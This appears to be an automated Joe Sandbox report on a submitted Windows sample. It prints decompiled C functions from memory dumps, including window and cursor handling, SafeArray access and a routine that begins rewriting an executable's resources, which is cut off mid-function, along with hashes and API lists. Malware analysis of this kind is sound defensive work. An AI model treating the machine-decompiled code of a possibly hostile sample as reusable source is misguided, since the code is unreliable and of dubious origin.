                                                                                                                                                                                                                            			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				struct HWND__* _t20;
                                                                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t20 = __eax;
                                                                                                                                                                                                                            				_t1 =  &_a4; // 0x443144
                                                                                                                                                                                                                            				_t23 =  *_t1;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t4 =  &_v12; // 0x443144
                                                                                                                                                                                                                            				ClientToScreen(__eax, _t4);
                                                                                                                                                                                                                            				GetWindowRect(_t20,  &_v28);
                                                                                                                                                                                                                            				_t6 =  &_v12; // 0x443144
                                                                                                                                                                                                                            				 *_t23 =  *_t6 - _v28.left;
                                                                                                                                                                                                                            				_t19 = _v8 - _v28.top;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                                                                                                                                                                                                            				return _t19;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClientRectScreenWindow
                                                                                                                                                                                                                            • String ID: D1D$D1D
                                                                                                                                                                                                                            • API String ID: 3371951266-2689743835
                                                                                                                                                                                                                            • Opcode ID: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                                                                                                                                                                                            • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E884() {
                                                                                                                                                                                                                            				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t3;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                            				_t3 = _t1;
                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                            					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                                                                                                                                                            					 *0x49b158 = _t1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *0x49b158 == 0) {
                                                                                                                                                                                                                            					 *0x49b158 = E00409ED4;
                                                                                                                                                                                                                            					return E00409ED4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                            • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                                                                                                                                                                                            • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00438E8C(intOrPtr* __eax, signed int __edx) {
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                            				intOrPtr* _t62;
                                                                                                                                                                                                                            				struct HICON__* _t65;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				intOrPtr* _t75;
                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				struct HWND__* _t88;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                            				intOrPtr* _t93;
                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				struct HWND__* _t107;
                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            				char _t118;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				void* _t131;
                                                                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                                                                            				intOrPtr* _t155;
                                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t155 = __eax;
                                                                                                                                                                                                                            				if( *0x49eb54 != 0) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					_t49 =  *0x49eb34; // 0x0
                                                                                                                                                                                                                            					_t50 =  *0x49eb34; // 0x0
                                                                                                                                                                                                                            					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                                                                                                                                                                                            					if( *0x49eb54 == 0) {
                                                                                                                                                                                                                            						_t168 =  *0x49eb58;
                                                                                                                                                                                                                            						if( *0x49eb58 != 0) {
                                                                                                                                                                                                                            							_t106 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            							_t107 = GetDesktopWindow();
                                                                                                                                                                                                                            							_t108 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            							E00443038(_t108, _t107, _t168, _t106);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t53 =  *0x49eb34; // 0x0
                                                                                                                                                                                                                            					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                                                                                                                                                                                            						__eflags =  *0x49eb54;
                                                                                                                                                                                                                            						_t6 =  &_v24;
                                                                                                                                                                                                                            						 *_t6 =  *0x49eb54 != 0;
                                                                                                                                                                                                                            						__eflags =  *_t6;
                                                                                                                                                                                                                            						 *0x49eb54 = 2;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49eb54 = 1;
                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t54 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                            						_t55 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                                                                                                                                                            						_t56 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                                                                                                                                                                                            							_t97 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                                                                                                                                                                                            							_t100 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t131 = E00438DBC(2);
                                                                                                                                                                                                                            						_t121 =  *_t155;
                                                                                                                                                                                                                            						_t60 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                                                                                                                                                                                            						if( *0x49eb58 != 0) {
                                                                                                                                                                                                                            							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                                                                                                                                                                                            								_t82 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            								E00443020(_t82, _t158);
                                                                                                                                                                                                                            								_t84 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            								_t177 =  *((char*)(_t84 + 0x6a));
                                                                                                                                                                                                                            								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                                                                                                                                                                                            									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                                                                                                                                                                                            									_t85 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t88 = GetDesktopWindow();
                                                                                                                                                                                                                            									_t121 =  *_t155;
                                                                                                                                                                                                                            									_t89 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t91 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            								E00443194(_t91, _t131, __eflags);
                                                                                                                                                                                                                            								_t93 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            								SetCursor(E004586EC( *_t93, _t158));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t62 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            						_t65 = SetCursor(E004586EC( *_t62, _t158));
                                                                                                                                                                                                                            						if( *0x49eb54 != 2) {
                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                            							return _t65;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t179 = _t117;
                                                                                                                                                                                                                            							if(_t117 != 0) {
                                                                                                                                                                                                                            								_t118 = E00438DF8(_t121);
                                                                                                                                                                                                                            								_t67 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                                                                                                                                                                                            								__eflags = _t118;
                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                            									E0043AAC0(_t118,  &_v24, _t155);
                                                                                                                                                                                                                            									_t65 = E00403DE8(_t118, __eflags);
                                                                                                                                                                                                                            									_t135 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									 *(_t135 + 0x54) = _t65;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t78 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                                                                                                                                                                                            									_t140 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									 *(_t140 + 0x54) = _t65;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_push( *((intOrPtr*)(_t155 + 4)));
                                                                                                                                                                                                                            								_t80 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *0x49eb38 == 0) {
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t119 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								_t41 = _t119 + 0x5c; // 0x5c
                                                                                                                                                                                                                            								_t42 = _t119 + 0x44; // 0x44
                                                                                                                                                                                                                            								_t65 = E00408E50(_t42, 0x10, _t41);
                                                                                                                                                                                                                            								if(_t65 != 0) {
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								if(_v28 != 0) {
                                                                                                                                                                                                                            									_t75 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									 *((intOrPtr*)( *_t75 + 0x34))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t72 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_t72 + 0x30))();
                                                                                                                                                                                                                            								_t74 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								return _t74;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t65 = E00438DBC(1);
                                                                                                                                                                                                                            					if( *0x49eb38 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t102 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                                                                                                                                                                                            					_t103 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                                                                                                                                                                                            					_t104 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                                                                                                                                                            					_t65 = E00438DBC(0);
                                                                                                                                                                                                                            					if( *0x49eb38 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t110 =  *0x49eb44; // 0x0
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
                                                                                                                                                                                                                            				if(_t165 >= 0) {
                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t114 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                                                                                                                                                                                            				_t166 = _t65 -  *0x49eb50; // 0x0
                                                                                                                                                                                                                            				if(_t166 < 0) {
                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                            			}

















































                                                                                                                                                                                                                            0x00438f74
                                                                                                                                                                                                                            0x00438f77
                                                                                                                                                                                                                            0x00438f7e
                                                                                                                                                                                                                            0x00438f84
                                                                                                                                                                                                                            0x00438f89
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00438e9d
                                                                                                                                                                                                                            0x00438ea4
                                                                                                                                                                                                                            0x00438ea9
                                                                                                                                                                                                                            0x00438eaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438eb1
                                                                                                                                                                                                                            0x00438eb9
                                                                                                                                                                                                                            0x00438ebc
                                                                                                                                                                                                                            0x00438ebe
                                                                                                                                                                                                                            0x00438ec4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00438F00
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00439025
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043907A
                                                                                                                                                                                                                              • Part of subcall function 00443194: 73751770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                                                                                                                                                                                              • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00439065
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$DesktopWindow$73751770Show
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 978888386-0
                                                                                                                                                                                                                            • Opcode ID: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                                                                                                                                                                                            • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E004107F0(intOrPtr* __eax) {
                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                            				char _v768;
                                                                                                                                                                                                                            				char _v772;
                                                                                                                                                                                                                            				intOrPtr* _v776;
                                                                                                                                                                                                                            				signed short* _v780;
                                                                                                                                                                                                                            				char _v784;
                                                                                                                                                                                                                            				signed int _v788;
                                                                                                                                                                                                                            				char _v792;
                                                                                                                                                                                                                            				intOrPtr* _v796;
                                                                                                                                                                                                                            				signed char _t43;
                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                            				intOrPtr* _t92;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				char* _t97;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v776 = __eax;
                                                                                                                                                                                                                            				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                                                                                                                                                                                                            					E00410638(0x80070057);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t43 =  *_v776;
                                                                                                                                                                                                                            				if((_t43 & 0x00000fff) == 0xc) {
                                                                                                                                                                                                                            					if((_t43 & 0x00000040) == 0) {
                                                                                                                                                                                                                            						_v780 =  *((intOrPtr*)(_v776 + 8));
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v788 =  *_v780 & 0x0000ffff;
                                                                                                                                                                                                                            					_t79 = _v788 - 1;
                                                                                                                                                                                                                            					if(_t79 >= 0) {
                                                                                                                                                                                                                            						_t85 = _t79 + 1;
                                                                                                                                                                                                                            						_t96 = 0;
                                                                                                                                                                                                                            						_t97 =  &_v772;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_v796 = _t97;
                                                                                                                                                                                                                            							_push(_v796 + 4);
                                                                                                                                                                                                                            							_t22 = _t96 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v780);
                                                                                                                                                                                                                            							L0040F78C();
                                                                                                                                                                                                                            							E00410638(_v780);
                                                                                                                                                                                                                            							_push( &_v784);
                                                                                                                                                                                                                            							_t25 = _t96 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v780);
                                                                                                                                                                                                                            							L0040F794();
                                                                                                                                                                                                                            							E00410638(_v780);
                                                                                                                                                                                                                            							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                                                                                                                                                                            							_t96 = _t96 + 1;
                                                                                                                                                                                                                            							_t97 = _t97 + 8;
                                                                                                                                                                                                                            							_t85 = _t85 - 1;
                                                                                                                                                                                                                            						} while (_t85 != 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t81 = _v788 - 1;
                                                                                                                                                                                                                            					if(_t81 >= 0) {
                                                                                                                                                                                                                            						_t84 = _t81 + 1;
                                                                                                                                                                                                                            						_t60 =  &_v768;
                                                                                                                                                                                                                            						_t92 =  &_v260;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							 *_t92 =  *_t60;
                                                                                                                                                                                                                            							_t92 = _t92 + 4;
                                                                                                                                                                                                                            							_t60 = _t60 + 8;
                                                                                                                                                                                                                            							_t84 = _t84 - 1;
                                                                                                                                                                                                                            						} while (_t84 != 0);
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            						} while (E00410794(_t83, _t98) != 0);
                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					_t83 = _v788 - 1;
                                                                                                                                                                                                                            					if(E00410764(_v788 - 1, _t98) != 0) {
                                                                                                                                                                                                                            						_push( &_v792);
                                                                                                                                                                                                                            						_push( &_v260);
                                                                                                                                                                                                                            						_push(_v780);
                                                                                                                                                                                                                            						L0040F79C();
                                                                                                                                                                                                                            						E00410638(_v780);
                                                                                                                                                                                                                            						E004109E8(_v792);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L15:
                                                                                                                                                                                                                            				_push(_v776);
                                                                                                                                                                                                                            				L0040F320();
                                                                                                                                                                                                                            				return E00410638(_v776);
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041095B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                                                                                                            • Opcode ID: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                                                                                                                                                                                            • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                            				int _t53;
                                                                                                                                                                                                                            				char _t56;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t64;
                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				intOrPtr* _t79;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t81 = _t82;
                                                                                                                                                                                                                            				_t83 = _t82 + 0xffffffec;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t81);
                                                                                                                                                                                                                            				_push(0x477494);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t83;
                                                                                                                                                                                                                            				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
                                                                                                                                                                                                                            				_v13 = _t61 != 0;
                                                                                                                                                                                                                            				if(_v13 == 0) {
                                                                                                                                                                                                                            					_pop(_t69);
                                                                                                                                                                                                                            					 *[fs:eax] = _t69;
                                                                                                                                                                                                                            					_push(0x47749b);
                                                                                                                                                                                                                            					return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *[fs:eax] = _t83;
                                                                                                                                                                                                                            					_t64 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
